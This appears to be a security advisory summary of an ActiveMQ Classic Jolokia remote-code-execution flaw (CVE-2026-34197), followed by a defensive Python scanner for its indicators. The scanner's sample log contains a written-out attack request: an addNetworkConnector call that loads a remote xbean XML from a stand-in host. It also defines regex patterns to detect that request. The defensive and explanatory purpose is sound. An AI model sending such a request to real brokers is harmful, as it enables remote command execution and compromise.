Overview
- Horizon3.ai reports that Anthropic’s Claude helped identify CVE-2026-34197 in ActiveMQ Classic, and Apache shipped fixes in versions 5.19.4 and 6.2.3.
- The exploit chains Jolokia’s addNetworkConnector operation with the VM transport so the broker fetches a remote Spring XML file that runs system commands.
- The attack generally needs a login to Jolokia, yet many brokers still use the default admin:admin credentials that make access trivial.
- On ActiveMQ 6.0.0 through 6.1.1, a separate flaw tracked as CVE-2024-32114 leaves Jolokia open without authentication, turning this into an unauthenticated RCE.
- Researchers advise upgrading now and checking for IOCs such as POSTs to /api/jolokia/ with addNetworkConnector, vm:// URIs with brokerConfig=xbean:http, outbound HTTP from the broker, or unexpected child processes, noting a severity score of 8.8 (high) and no confirmed widespread exploitation.
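As an added example (not from Horizon3.ai's report or the ActiveMQ project), a small Python scanner that applies the two request-side indicators above to constructed reverse-proxy records; it also matches GET-style Jolokia exec paths, which goes slightly beyond the POST indicator in the summary. The JSON-lines record format, field names and addresses are assumptions.

```python
import json
import re
from typing import Dict, List

# Constructed sample records (JSON lines with method, path and body), the shape a
# reverse proxy in front of the broker could be configured to log. Not real traffic.
SAMPLE_LOG = r'''
{"src": "10.0.0.5", "method": "GET", "path": "/admin/", "body": ""}
{"src": "10.0.0.9", "method": "POST", "path": "/api/jolokia/", "body": "{\"type\":\"read\",\"mbean\":\"java.lang:type=Memory\"}"}
{"src": "203.0.113.10", "method": "POST", "path": "/api/jolokia/", "body": "{\"operation\":\"addNetworkConnector\",\"arguments\":[\"vm://broker?brokerConfig=xbean:http://203.0.113.10/c.xml\"]}"}
{"src": "10.0.0.9", "method": "GET", "path": "/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/addNetworkConnector/static:(tcp:!/!/10.0.0.2:61616)", "body": ""}
'''.strip()

# vm:// URI whose brokerConfig points at a remote xbean XML: the high-confidence IOC.
XBEAN_REMOTE = re.compile(r"vm://[^\s\"']*brokerConfig=xbean:https?:", re.IGNORECASE)
# Any Jolokia request naming the addNetworkConnector operation: worth reviewing,
# since a legitimate admin may also add connectors this way (lower confidence).
ADD_CONNECTOR = re.compile(r"addNetworkConnector", re.IGNORECASE)


def classify(record: Dict[str, str]) -> List[str]:
    """Return the names of the indicators matched by one proxy record."""
    hits: List[str] = []
    path = record.get("path", "")
    haystack = path + " " + record.get("body", "")
    if path.startswith("/api/jolokia") and ADD_CONNECTOR.search(haystack):
        hits.append("jolokia_addNetworkConnector")
    if XBEAN_REMOTE.search(haystack):
        hits.append("vm_brokerConfig_xbean_http")
    return hits


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse JSON lines and return one finding per record that matched an indicator."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        hits = classify(rec)
        if hits:
            findings.append({"src": rec["src"], "path": rec["path"], "rules": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Records that match only the addNetworkConnector rule deserve a look at who sent them, while a brokerConfig=xbean:http match should be treated as a likely compromise and paired with the outbound-HTTP and child-process checks the summary lists.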